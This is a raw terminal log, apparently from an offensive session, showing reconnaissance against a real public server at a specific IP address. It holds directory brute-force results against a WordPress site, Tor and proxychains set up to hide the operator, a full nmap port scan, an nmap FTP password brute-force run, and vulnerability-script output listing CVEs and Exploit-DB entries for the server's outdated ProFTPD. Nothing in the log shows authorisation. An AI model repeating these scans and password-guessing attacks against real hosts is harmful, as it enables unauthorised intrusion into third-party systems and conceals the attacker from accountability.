  1251. + http://184.154.192.250/blog/wp-admin/index.php (CODE:302|SIZE:0)
  1252.  
  1253. ---- Entering directory: http://184.154.192.250/blog/wp-content/ ----
  1254. + http://184.154.192.250/blog/wp-content/admin.pl (CODE:403|SIZE:954)
  1255. + http://184.154.192.250/blog/wp-content/index.php (CODE:200|SIZE:0)
  1256.  
  1257. ---- Entering directory: http://184.154.192.250/blog/wp-includes/ ----
  1258. + http://184.154.192.250/blog/wp-includes/admin.pl (CODE:403|SIZE:954)
  1259. + http://184.154.192.250/blog/wp-includes/index.php (CODE:301|SIZE:0)
  1260.  
  1261. ---- Entering directory: http://184.154.192.250/Blog/0/ ----
  1262. + http://184.154.192.250/Blog/0/index.php (CODE:301|SIZE:0)
  1263.  
  1264. ---- Entering directory: http://184.154.192.250/Blog/2011/ ----
  1265. + http://184.154.192.250/Blog/2011/13 (CODE:200|SIZE:13756)
  1266. + http://184.154.192.250/Blog/2011/14 (CODE:200|SIZE:13756)
  1267. + http://184.154.192.250/Blog/2011/15 (CODE:200|SIZE:13756)
  1268. + http://184.154.192.250/Blog/2011/20 (CODE:200|SIZE:13756)
  1269. + http://184.154.192.250/Blog/2011/21 (CODE:200|SIZE:13756)
  1270. + http://184.154.192.250/Blog/2011/22 (CODE:200|SIZE:13756)
  1271. + http://184.154.192.250/Blog/2011/23 (CODE:200|SIZE:13756)
  1272. + http://184.154.192.250/Blog/2011/24 (CODE:200|SIZE:13756)
  1273. + http://184.154.192.250/Blog/2011/25 (CODE:200|SIZE:13756)
  1274. + http://184.154.192.250/Blog/2011/30 (CODE:200|SIZE:13756)
  1275. + http://184.154.192.250/Blog/2011/32 (CODE:200|SIZE:13756)
  1276. + http://184.154.192.250/Blog/2011/42 (CODE:200|SIZE:13756)
  1277. + http://184.154.192.250/Blog/2011/50 (CODE:200|SIZE:13756)
  1278. + http://184.154.192.250/Blog/2011/51 (CODE:200|SIZE:13756)
  1279. + http://184.154.192.250/Blog/2011/64 (CODE:200|SIZE:13756)
  1280. + http://184.154.192.250/Blog/2011/96 (CODE:200|SIZE:13756)
  1281. + http://184.154.192.250/Blog/2011/atom (CODE:301|SIZE:0)
  1282. + http://184.154.192.250/Blog/2011/index.php (CODE:301|SIZE:0)
  1283. + http://184.154.192.250/Blog/2011/page1 (CODE:301|SIZE:0)
  1284. + http://184.154.192.250/Blog/2011/page2 (CODE:301|SIZE:0)
  1285. + http://184.154.192.250/Blog/2011/rdf (CODE:301|SIZE:0)
  1286. + http://184.154.192.250/Blog/2011/rss (CODE:301|SIZE:0)
  1287. + http://184.154.192.250/Blog/2011/rss2 (CODE:301|SIZE:0)
  1288.  
  1289. ---- Entering directory: http://184.154.192.250/Blog/2012/ ----
  1290. + http://184.154.192.250/Blog/2012/13 (CODE:200|SIZE:13756)
  1291. + http://184.154.192.250/Blog/2012/14 (CODE:200|SIZE:13756)
  1292. + http://184.154.192.250/Blog/2012/15 (CODE:200|SIZE:13756)
  1293. + http://184.154.192.250/Blog/2012/20 (CODE:200|SIZE:13756)
  1294. + http://184.154.192.250/Blog/2012/21 (CODE:200|SIZE:13756)
  1295. + http://184.154.192.250/Blog/2012/22 (CODE:200|SIZE:13756)
  1296. + http://184.154.192.250/Blog/2012/23 (CODE:200|SIZE:13756)
  1297. + http://184.154.192.250/Blog/2012/24 (CODE:200|SIZE:13756)
  1298. + http://184.154.192.250/Blog/2012/25 (CODE:200|SIZE:13756)
  1299. + http://184.154.192.250/Blog/2012/30 (CODE:200|SIZE:13756)
  1300. + http://184.154.192.250/Blog/2012/32 (CODE:200|SIZE:13756)
  1301. + http://184.154.192.250/Blog/2012/42 (CODE:200|SIZE:13756)
  1302. + http://184.154.192.250/Blog/2012/50 (CODE:200|SIZE:13756)
  1303. + http://184.154.192.250/Blog/2012/51 (CODE:200|SIZE:13756)
  1304. + http://184.154.192.250/Blog/2012/64 (CODE:200|SIZE:13756)
  1305. + http://184.154.192.250/Blog/2012/96 (CODE:200|SIZE:13756)
  1306. + http://184.154.192.250/Blog/2012/atom (CODE:301|SIZE:0)
  1307. + http://184.154.192.250/Blog/2012/index.php (CODE:301|SIZE:0)
  1308. + http://184.154.192.250/Blog/2012/page1 (CODE:301|SIZE:0)
  1309. + http://184.154.192.250/Blog/2012/page2 (CODE:301|SIZE:0)
  1310. + http://184.154.192.250/Blog/2012/rdf (CODE:301|SIZE:0)
  1311. + http://184.154.192.250/Blog/2012/rss (CODE:301|SIZE:0)
  1312. + http://184.154.192.250/Blog/2012/rss2 (CODE:301|SIZE:0)
  1313.  
  1314. ---- Entering directory: http://184.154.192.250/Blog/embed/ ----
  1315. + http://184.154.192.250/Blog/embed/index.php (CODE:301|SIZE:0)
  1316.  
  1317. ---- Entering directory: http://184.154.192.250/Blog/feed/ ----
  1318. + http://184.154.192.250/Blog/feed/feed (CODE:301|SIZE:0)
  1319. + http://184.154.192.250/Blog/feed/index.php (CODE:301|SIZE:0)
  1320. + http://184.154.192.250/Blog/feed/rss (CODE:301|SIZE:0)
  1321. + http://184.154.192.250/Blog/feed/rss2 (CODE:301|SIZE:0)
  1322.  
  1323. ---- Entering directory: http://184.154.192.250/Blog/uncategorized/ ----
  1324. + http://184.154.192.250/Blog/uncategorized/atom (CODE:301|SIZE:0)
  1325. + http://184.154.192.250/Blog/uncategorized/index.php (CODE:301|SIZE:0)
  1326. + http://184.154.192.250/Blog/uncategorized/page1 (CODE:301|SIZE:0)
  1327. + http://184.154.192.250/Blog/uncategorized/rdf (CODE:301|SIZE:0)
  1328. + http://184.154.192.250/Blog/uncategorized/rss (CODE:301|SIZE:0)
  1329. + http://184.154.192.250/Blog/uncategorized/rss2 (CODE:301|SIZE:0)
  1330.  
  1331. ---- Entering directory: http://184.154.192.250/contact-us/_notes/ ----
  1332. + http://184.154.192.250/contact-us/_notes/admin.pl (CODE:403|SIZE:954)
  1333. + http://184.154.192.250/contact-us/_notes/atom (CODE:301|SIZE:0)
  1334. + http://184.154.192.250/contact-us/_notes/index.php (CODE:301|SIZE:0)
  1335. + http://184.154.192.250/contact-us/_notes/rdf (CODE:301|SIZE:0)
  1336. + http://184.154.192.250/contact-us/_notes/rss (CODE:301|SIZE:0)
  1337. + http://184.154.192.250/contact-us/_notes/rss2 (CODE:301|SIZE:0)
  1338.  
  1339. ---- Entering directory: http://184.154.192.250/feed/atom/ ----
  1340. + http://184.154.192.250/feed/atom/atom (CODE:301|SIZE:0)
  1341. + http://184.154.192.250/feed/atom/feed (CODE:301|SIZE:0)
  1342. + http://184.154.192.250/feed/atom/index.php (CODE:301|SIZE:0)
  1343. + http://184.154.192.250/feed/atom/rdf (CODE:301|SIZE:0)
  1344. + http://184.154.192.250/feed/atom/rss (CODE:301|SIZE:0)
  1345. + http://184.154.192.250/feed/atom/rss2 (CODE:301|SIZE:0)
  1346.  
  1347. ---- Entering directory: http://184.154.192.250/feed/rdf/ ----
  1348. + http://184.154.192.250/feed/rdf/atom (CODE:301|SIZE:0)
  1349. + http://184.154.192.250/feed/rdf/feed (CODE:301|SIZE:0)
  1350. + http://184.154.192.250/feed/rdf/index.php (CODE:301|SIZE:0)
  1351. + http://184.154.192.250/feed/rdf/rdf (CODE:301|SIZE:0)
  1352. + http://184.154.192.250/feed/rdf/rss (CODE:301|SIZE:0)
  1353. + http://184.154.192.250/feed/rdf/rss2 (CODE:301|SIZE:0)
  1354.  
  1355. ---- Entering directory: http://184.154.192.250/include/_notes/ ----
  1356. + http://184.154.192.250/include/_notes/admin.pl (CODE:403|SIZE:954)
  1357. + http://184.154.192.250/include/_notes/atom (CODE:301|SIZE:0)
  1358. + http://184.154.192.250/include/_notes/index.php (CODE:301|SIZE:0)
  1359. + http://184.154.192.250/include/_notes/rdf (CODE:301|SIZE:0)
  1360. + http://184.154.192.250/include/_notes/rss (CODE:301|SIZE:0)
  1361. + http://184.154.192.250/include/_notes/rss2 (CODE:301|SIZE:0)
  1362.  
  1363. ---- Entering directory: http://184.154.192.250/test/file/ ----
  1364. + http://184.154.192.250/test/file/admin.pl (CODE:403|SIZE:954)
  1365. + http://184.154.192.250/test/file/atom (CODE:301|SIZE:0)
  1366. + http://184.154.192.250/test/file/index.php (CODE:301|SIZE:0)
  1367. + http://184.154.192.250/test/file/rdf (CODE:301|SIZE:0)
  1368. + http://184.154.192.250/test/file/rss (CODE:301|SIZE:0)
  1369. + http://184.154.192.250/test/file/rss2 (CODE:301|SIZE:0)
  1370.  
  1371. ---- Entering directory: http://184.154.192.250/test/images/ ----
  1372. + http://184.154.192.250/test/images/admin.pl (CODE:403|SIZE:954)
  1373. + http://184.154.192.250/test/images/atom (CODE:301|SIZE:0)
  1374. + http://184.154.192.250/test/images/index.php (CODE:301|SIZE:0)
  1375. + http://184.154.192.250/test/images/rdf (CODE:301|SIZE:0)
  1376. + http://184.154.192.250/test/images/rss (CODE:301|SIZE:0)
  1377. + http://184.154.192.250/test/images/rss2 (CODE:301|SIZE:0)
  1378. + http://184.154.192.250/test/images/Thumbs.db (CODE:200|SIZE:27648)
  1379.  
  1380. ---- Entering directory: http://184.154.192.250/time/Image/ ----
  1381. + http://184.154.192.250/time/Image/admin.pl (CODE:403|SIZE:954)
  1382. + http://184.154.192.250/time/Image/atom (CODE:301|SIZE:0)
  1383. + http://184.154.192.250/time/Image/index.php (CODE:301|SIZE:0)
  1384. + http://184.154.192.250/time/Image/rdf (CODE:301|SIZE:0)
  1385. + http://184.154.192.250/time/Image/rss (CODE:301|SIZE:0)
  1386. + http://184.154.192.250/time/Image/rss2 (CODE:301|SIZE:0)
  1387.  
  1388. ---- Entering directory: http://184.154.192.250/uncategorized/feed/ ----
  1389. + http://184.154.192.250/uncategorized/feed/feed (CODE:301|SIZE:0)
  1390. + http://184.154.192.250/uncategorized/feed/index.php (CODE:301|SIZE:0)
  1391. + http://184.154.192.250/uncategorized/feed/rss (CODE:301|SIZE:0)
  1392. + http://184.154.192.250/uncategorized/feed/rss2 (CODE:301|SIZE:0)
  1393.  
  1394. ---- Entering directory: http://184.154.192.250/WEB-INF/classes/ ----
  1395. + http://184.154.192.250/WEB-INF/classes/admin.pl (CODE:403|SIZE:954)
  1396. + http://184.154.192.250/WEB-INF/classes/atom (CODE:301|SIZE:0)
  1397. + http://184.154.192.250/WEB-INF/classes/index.php (CODE:301|SIZE:0)
  1398. + http://184.154.192.250/WEB-INF/classes/rdf (CODE:301|SIZE:0)
  1399. + http://184.154.192.250/WEB-INF/classes/rss (CODE:301|SIZE:0)
  1400. + http://184.154.192.250/WEB-INF/classes/rss2 (CODE:301|SIZE:0)
  1401.  
  1402. ---- Entering directory: http://184.154.192.250/WEB-INF/lib/ ----
  1403. + http://184.154.192.250/WEB-INF/lib/admin.pl (CODE:403|SIZE:954)
  1404. + http://184.154.192.250/WEB-INF/lib/atom (CODE:301|SIZE:0)
  1405. + http://184.154.192.250/WEB-INF/lib/index.php (CODE:301|SIZE:0)
  1406. + http://184.154.192.250/WEB-INF/lib/rdf (CODE:301|SIZE:0)
  1407. + http://184.154.192.250/WEB-INF/lib/rss (CODE:301|SIZE:0)
  1408. + http://184.154.192.250/WEB-INF/lib/rss2 (CODE:301|SIZE:0)
  1409.  
  1410. ---- Entering directory: http://184.154.192.250/works/flash/ ----
  1411. + http://184.154.192.250/works/flash/admin.pl (CODE:403|SIZE:954)
  1412. + http://184.154.192.250/works/flash/atom (CODE:301|SIZE:0)
  1413. + http://184.154.192.250/works/flash/index.php (CODE:301|SIZE:0)
  1414. + http://184.154.192.250/works/flash/rdf (CODE:301|SIZE:0)
  1415. + http://184.154.192.250/works/flash/rss (CODE:301|SIZE:0)
  1416. + http://184.154.192.250/works/flash/rss2 (CODE:301|SIZE:0)
  1417.  
  1418. ---- Entering directory: http://184.154.192.250/works/images/ ----
  1419. + http://184.154.192.250/works/images/admin.pl (CODE:403|SIZE:954)
  1420. + http://184.154.192.250/works/images/atom (CODE:301|SIZE:0)
  1421.  
  1422.  
  1423.  
  1424. INSTALL TOR
  1425.  
  1426. root@blackbox:~# apt-get install tor
  1427.  
  1428. START TOR
  1429.  
  1430. root@blackbox:~# service tor start
  1431.  
  1432. CHECK TOR STATUS
  1433.  
  1434. root@blackbox:~# service tor status
  1435.  
  1436.  
  1437. CHECK IF ANONYMITY WORKS
  1438.  
  1439. root@blackbox:~# proxychains curl http://icanhazip.com
  1440. ProxyChains-3.1 (http://proxychains.sf.net)
  1441. |DNS-request| icanhazip.com
  1442. |S-chain|-<>-127.0.0.1:9050-<><>-4.2.2.2:53-<><>-OK
  1443. |DNS-response| icanhazip.com is 104.20.16.242
  1444. |S-chain|-<>-127.0.0.1:9050-<><>-104.20.16.242:80-<><>-OK
  1445. 89.234.157.254
  1446.  
  1447.  
  1448. START NMAP THROUGH PROXYCHAINS
  1449.  
  1450. root@blackbox:/opt# proxychains nmap -p 1-65535 -T4 -A -v 184.154.192.250 -Pn --open
  1451.  
  1452. Discovered open port 443/tcp on 184.154.192.250
  1453. Discovered open port 110/tcp on 184.154.192.250
  1454. Discovered open port 995/tcp on 184.154.192.250
  1455. Discovered open port 53/tcp on 184.154.192.250
  1456. Discovered open port 111/tcp on 184.154.192.250
  1457. Discovered open port 554/tcp on 184.154.192.250
  1458. Discovered open port 143/tcp on 184.154.192.250
  1459. Discovered open port 22/tcp on 184.154.192.250
  1460. Discovered open port 25/tcp on 184.154.192.250
  1461. Discovered open port 993/tcp on 184.154.192.250
  1462. Discovered open port 3306/tcp on 184.154.192.250
  1463. Discovered open port 80/tcp on 184.154.192.250
  1464. Discovered open port 587/tcp on 184.154.192.250
  1465. Discovered open port 21/tcp on 184.154.192.250
  1466. Discovered open port 106/tcp on 184.154.192.250
  1467. Discovered open port 746/tcp on 184.154.192.250
  1468. Discovered open port 7070/tcp on 184.154.192.250
  1469. Discovered open port 8443/tcp on 184.154.192.250
  1470. Discovered open port 465/tcp on 184.154.192.250
  1471. Discovered open port 8880/tcp on 184.154.192.250
  1472.  
  1473.  
  1474. NMAP NSE FTP
  1475.  
  1476. root@blackbox:/opt# ls /usr/share/nmap/scripts/ | grep ftp
  1477. ftp-anon.nse
  1478. ftp-bounce.nse
  1479. ftp-brute.nse
  1480. ftp-libopie.nse
  1481. ftp-proftpd-backdoor.nse
  1482. ftp-syst.nse
  1483. ftp-vsftpd-backdoor.nse
  1484. ftp-vuln-cve2010-4221.nse
  1485. tftp-enum.nse
  1486.  
  1487. root@blackbox:/opt# proxychains nmap -oN ftp.nmap --script "ftp-brute" --script-args= -d -Pn -v -p 21 184.154.192.250
  1488.  
  1489. PORT STATE SERVICE REASON
  1490. 21/tcp open ftp syn-ack ttl 49
  1491. | ftp-brute:
  1492. | Accounts: No valid accounts found
  1493. |_ Statistics: Performed 563 guesses in 618 seconds, average tps: 1.1
  1494. Final times for host: srtt: 145410 rttvar: 145410 to: 727050
  1495.  
  1496.  
  1497. root@blackbox:~# nmap -sV -Pn 184.154.192.250 --open
  1498. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:21 CST
  1499. Nmap scan report for server.etours.cn (184.154.192.250)
  1500. Host is up (0.15s latency).
  1501. Not shown: 981 closed ports, 1 filtered port
  1502. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  1503. PORT STATE SERVICE VERSION
  1504. 21/tcp open ftp ProFTPD 1.3.3e
  1505. 22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
  1506. 25/tcp open smtp qmail smtpd
  1507. 53/tcp open domain (unknown banner: none)
  1508. 80/tcp open http Apache httpd (PleskLin)
  1509. 106/tcp open pop3pw poppassd
  1510. 110/tcp open pop3 Courier pop3d
  1511. 111/tcp open rpcbind 2 (RPC #100000)
  1512. 143/tcp open imap Courier Imapd (released 2004)
  1513. 443/tcp open ssl/https?
  1514. 465/tcp open ssl/smtps?
  1515. 554/tcp open tcpwrapped
  1516. 587/tcp open smtp qmail smtpd
  1517. 993/tcp open ssl/imaps?
  1518. 995/tcp open ssl/pop3s?
  1519. 3306/tcp open mysql MySQL 5.0.77
  1520. 7070/tcp open tcpwrapped
  1521. 8443/tcp open ssl/https-alt sw-cp-server
  1522. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  1523. SF-Port53-TCP:V=7.80%I=7%D=1/22%Time=5E28AEC7%P=x86_64-pc-linux-gnu%r(DNSV
  1524. SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
  1525. SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\
  1526. SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
  1527. Service Info: Host: localhost.localdomain; OS: Unix
  1528.  
  1529. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1530. Nmap done: 1 IP address (1 host up) scanned in 39.36 seconds
  1531.  
  1532.  
  1533. root@blackbox:/opt# cd /usr/share/nmap/scripts/
  1534. root@blackbox:/usr/share/nmap/scripts# git clone https://github.com/vulnersCom/nmap-vulners.git
  1535. root@blackbox:/usr/share/nmap/scripts# git clone https://github.com/scipag/vulscan.git
  1536. root@blackbox:/usr/share/nmap/scripts# ls -la vulscan/*.csv
  1537. -rw-r--r-- 1 root root 16756993 Jan 21 04:59 vulscan/cve.csv
  1538. -rw-r--r-- 1 root root 1864748 Jan 21 04:59 vulscan/exploitdb.csv
  1539. -rw-r--r-- 1 root root 1524310 Jan 21 04:59 vulscan/openvas.csv
  1540. -rw-r--r-- 1 root root 6718903 Jan 21 04:59 vulscan/osvdb.csv
  1541. -rw-r--r-- 1 root root 7001128 Jan 21 04:59 vulscan/scipvuldb.csv
  1542. -rw-r--r-- 1 root root 7227028 Jan 21 04:59 vulscan/securityfocus.csv
  1543. -rw-r--r-- 1 root root 1826138 Jan 21 04:59 vulscan/securitytracker.csv
  1544. -rw-r--r-- 1 root root 4576711 Jan 21 04:59 vulscan/xforce.csv
  1545.  
  1546. root@blackbox:/usr/share/nmap/scripts# cd vulscan/
  1547. root@blackbox:/usr/share/nmap/scripts/vulscan# cd utilities/
  1548. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities# cd updater/
  1549. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities/updater# chmod +x updateFiles.sh
  1550. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities/updater# ./updateFiles.sh
  1551. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/cve.csv...
  1552. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/exploitdb.csv...
  1553. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/openvas.csv...
  1554. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/osvdb.csv...
  1555. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/scipvuldb.csv...
  1556. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/securityfocus.csv...
  1557. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/securitytracker.csv...
  1558. Downloading https://raw.githubusercontent.com/scipag/vulscan/master/xforce.csv...
  1559. Returning 0, as no files have been updated, but script ran successfully
  1560.  
  1561.  
  1562. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities/updater# cd ..
  1563. root@blackbox:/usr/share/nmap/scripts/vulscan/utilities# cd ..
  1564. root@blackbox:/usr/share/nmap/scripts/vulscan# cd ..
  1565.  
  1566.  
  1567. root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners -sV -p21 184.154.192.250
  1568. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:23 CST
  1569. Nmap scan report for server.etours.cn (184.154.192.250)
  1570. Host is up (0.037s latency).
  1571.  
  1572. PORT STATE SERVICE VERSION
  1573. 21/tcp open ftp ProFTPD 1.3.3e
  1574. Service Info: OS: Unix
  1575.  
  1576. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1577. Nmap done: 1 IP address (1 host up) scanned in 4.06 seconds
  1578.  
  1579. root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners -sV -p22 184.154.192.250
  1580. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:23 CST
  1581. Nmap scan report for server.etours.cn (184.154.192.250)
  1582. Host is up (0.036s latency).
  1583.  
  1584. PORT STATE SERVICE VERSION
  1585. 22/tcp open tcpwrapped
  1586.  
  1587. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1588. Nmap done: 1 IP address (1 host up) scanned in 2.14 seconds
  1589.  
  1590.  
  1591. root@blackbox:/usr/share/nmap/scripts# nmap --script vulscan -sV -p21 184.154.192.250
  1592. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:23 CST
  1593. Nmap scan report for server.etours.cn (184.154.192.250)
  1594. Host is up (0.036s latency).
  1595.  
  1596. PORT STATE SERVICE VERSION
  1597. 21/tcp open ftp ProFTPD 1.3.3e
  1598. | vulscan: VulDB - https://vuldb.com:
  1599. | [59589] ProFTPD up to 1.3.3 Use-After-Free memory corruption
  1600. | [4290] ProFTPD up to 1.3.3 mod_sftpd Big Payload denial of service
  1601. | [56304] ProFTPD up to 1.3.3 contrib/mod_sql.c) sql_prepare_where memory corruption
  1602. | [138380] ProFTPD 1.3.5b mod_copy Code Execution
  1603. | [81624] ProFTPD up to 1.3.5a/1.3.6rc1 mod_tls mod_tls.c weak encryption
  1604. | [75436] ProFTPD 1.3.4e/1.3.5 mod_copy File privilege escalation
  1605. | [10259] ProFTPD 1.3.4/1.3.5 mod_sftp/mod_sftp_pam kbdint.c resp_count denial of service
  1606. | [7244] ProFTPD up to 1.3.4 MKD/XMKD Command race condition
  1607. | [55410] ProFTPD 1.3.2/1.3.3 Telnet netio.c pr_netio_telnet_gets memory corruption
  1608. | [55392] ProFTPD up to 1.3.2 pr_data_xfer denial of service
  1609. | [50631] ProFTPD 1.3.1/1.3.2/1.3.3 mod_tls unknown vulnerability
  1610. | [46500] ProFTPD 1.3.1 mod_sql_mysql sql injection
  1611. | [46499] ProFTPD 1.3.1/1.3.2/1.3.2 Rc2 mod_sql sql injection
  1612. | [44191] ProFTPD 1.3.1 FTP Command cross site request forgery
  1613. | [36309] ProFTPD 1.3.0 Rc1 mod_sql Plaintext unknown vulnerability
  1614. | [2747] ProFTPD 1.3.0/1.3.0a mod_ctrls pr_ctrls_recv_request memory corruption
  1615. | [33495] ProFTPD 1.3.0a Configuration File affected denial of service
  1616. | [2711] ProFTPD 1.3.0a mod_tls tls_x509_name_oneline memory corruption
  1617. | [2705] ProFTPD 1.3.0 main.c CommandBufferSize denial of service
  1618. |
  1619. | MITRE CVE - https://cve.mitre.org:
  1620. | [CVE-2011-4130] Use-after-free vulnerability in the Response API in ProFTPD before 1.3.3g allows remote authenticated users to execute arbitrary code via vectors involving an error that occurs after an FTP data transfer.
  1621. | [CVE-2011-1137] Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD 1.3.3d and earlier allows remote attackers to cause a denial of service (memory consumption leading to OOM kill) via a malformed SSH message.
  1622. | [CVE-2010-4652] Heap-based buffer overflow in the sql_prepare_where function (contrib/mod_sql.c) in ProFTPD before 1.3.3d, when mod_sql is enabled, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted username containing substitution tags, which are not properly handled during construction of an SQL query.
  1623. | [CVE-2010-4221] Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.
  1624. | [CVE-2010-3867] Multiple directory traversal vulnerabilities in the mod_site_misc module in ProFTPD before 1.3.3c allow remote authenticated users to create directories, delete directories, create symlinks, and modify file timestamps via directory traversal sequences in a (1) SITE MKDIR, (2) SITE RMDIR, (3) SITE SYMLINK, or (4) SITE UTIME command.
  1625. | [CVE-2009-3639] The mod_tls module in ProFTPD before 1.3.2b, and 1.3.3 before 1.3.3rc2, when the dNSNameRequired TLS option is enabled, does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 client certificate, which allows remote attackers to bypass intended client-hostname restrictions via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
  1626. | [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
  1627. | [CVE-2012-6095] ProFTPD before 1.3.5rc1, when using the UserOwner directive, allows local users to modify the ownership of arbitrary files via a race condition and a symlink attack on the (1) MKD or (2) XMKD commands.
  1628. | [CVE-2009-0543] ProFTPD Server 1.3.1, with NLS support enabled, allows remote attackers to bypass SQL injection protection mechanisms via invalid, encoded multibyte characters, which are not properly handled in (1) mod_sql_mysql and (2) mod_sql_postgres.
  1629. | [CVE-2009-0542] SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
  1630. | [CVE-2008-7265] The pr_data_xfer function in ProFTPD before 1.3.2rc3 allows remote authenticated users to cause a denial of service (CPU consumption) via an ABOR command during a data transfer.
  1631. | [CVE-2008-4242] ProFTPD 1.3.1 interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI that leverages an existing session from the FTP client implementation in a web browser.
  1632. | [CVE-2006-6563] Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
  1633. | [CVE-2006-6171] ** DISPUTED ** ProFTPD 1.3.0a and earlier does not properly set the buffer size limit when CommandBufferSize is specified in the configuration file, which leads to an off-by-two buffer underflow. NOTE: in November 2006, the role of CommandBufferSize was originally associated with CVE-2006-5815, but this was an error stemming from a vague initial disclosure. NOTE: ProFTPD developers dispute this issue, saying that the relevant memory location is overwritten by assignment before further use within the affected function, so this is not a vulnerability.
  1634. | [CVE-2006-6170] Buffer overflow in the tls_x509_name_oneline function in the mod_tls module, as used in ProFTPD 1.3.0a and earlier, and possibly other products, allows remote attackers to execute arbitrary code via a large data length argument, a different vulnerability than CVE-2006-5815.
  1635. | [CVE-2006-5815] Stack-based buffer overflow in the sreplace function in ProFTPD 1.3.0 and earlier allows remote attackers, probably authenticated, to cause a denial of service and execute arbitrary code, as demonstrated by vd_proftpd.pm, a "ProFTPD remote exploit."
  1636. | [CVE-2005-4816] Buffer overflow in mod_radius in ProFTPD before 1.3.0rc2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long password.
  1637. | [CVE-2005-2390] Multiple format string vulnerabilities in ProFTPD before 1.3.0rc2 allow attackers to cause a denial of service or obtain sensitive information via (1) certain inputs to the shutdown message from ftpshut, or (2) the SQLShowInfo mod_sql directive.
  1638. |
  1639. | SecurityFocus - https://www.securityfocus.com/bid/:
  1640. | [50631] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
  1641. |
  1642. | IBM X-Force - https://exchange.xforce.ibmcloud.com:
  1643. | [80980] ProFTPD FTP commands symlink
  1644. | [71226] ProFTPD pool code execution
  1645. | [65207] ProFTPD mod_sftp module denial of service
  1646. | [64495] ProFTPD sql_prepare_where() buffer overflow
  1647. | [63658] ProFTPD FTP server backdoor
  1648. | [63407] mod_sql module for ProFTPD buffer overflow
  1649. | [63155] ProFTPD pr_data_xfer denial of service
  1650. | [62909] ProFTPD mod_site_misc directory traversal
  1651. | [62908] ProFTPD pr_netio_telnet_gets() buffer overflow
  1652. | [53936] ProFTPD mod_tls SSL certificate security bypass
  1653. | [48951] ProFTPD mod_sql username percent SQL injection
  1654. | [48558] ProFTPD NLS support SQL injection protection bypass
  1655. | [45274] ProFTPD URL cross-site request forgery
  1656. | [33733] ProFTPD Auth API security bypass
  1657. | [31461] ProFTPD mod_radius buffer overflow
  1658. | [30906] ProFTPD Controls (mod_ctrls) module buffer overflow
  1659. | [30554] ProFTPD mod_tls module tls_x509_name_oneline() buffer overflow
  1660. | [30147] ProFTPD sreplace() buffer overflow
  1661. | [21530] ProFTPD mod_sql format string attack
  1662. | [21528] ProFTPD shutdown message format string attack
  1663. | [19410] GProFTPD file name format string attack
  1664. | [18453] ProFTPD SITE CHGRP command allows group ownership modification
  1665. | [17724] ProFTPD could allow an attacker to obtain valid accounts
  1666. | [16038] ProFTPD CIDR entry ACL bypass
  1667. | [15387] ProFTPD off-by-one _xlate_ascii_write function buffer overflow
  1668. | [12369] ProFTPD mod_sql SQL injection
  1669. | [12200] ProFTPD ASCII file newline buffer overflow
  1670. | [10932] ProFTPD long PASS command buffer overflow
  1671. | [8332] ProFTPD mod_sqlpw stores passwords in the wtmp log file
  1672. | [7818] ProFTPD ls &quot
  1673. | [7816] ProFTPD file globbing denial of service
  1674. | [7126] ProFTPD fails to resolve hostnames
  1675. | [6433] ProFTPD format string
  1676. | [6209] proFTPD /var symlink
  1677. | [6208] ProFTPD contains configuration error in postinst script when running as root
  1678. | [5801] proftpd memory leak when using SIZE or USER commands
  1679. | [5737] ProFTPD system using mod_sqlpw unauthorized access
  1680. |
  1681. | Exploit-DB - https://www.exploit-db.com:
  1682. | [16878] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
  1683. | [16851] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
  1684. | [15662] ProFTPD 1.3.3c compromised source remote root Trojan
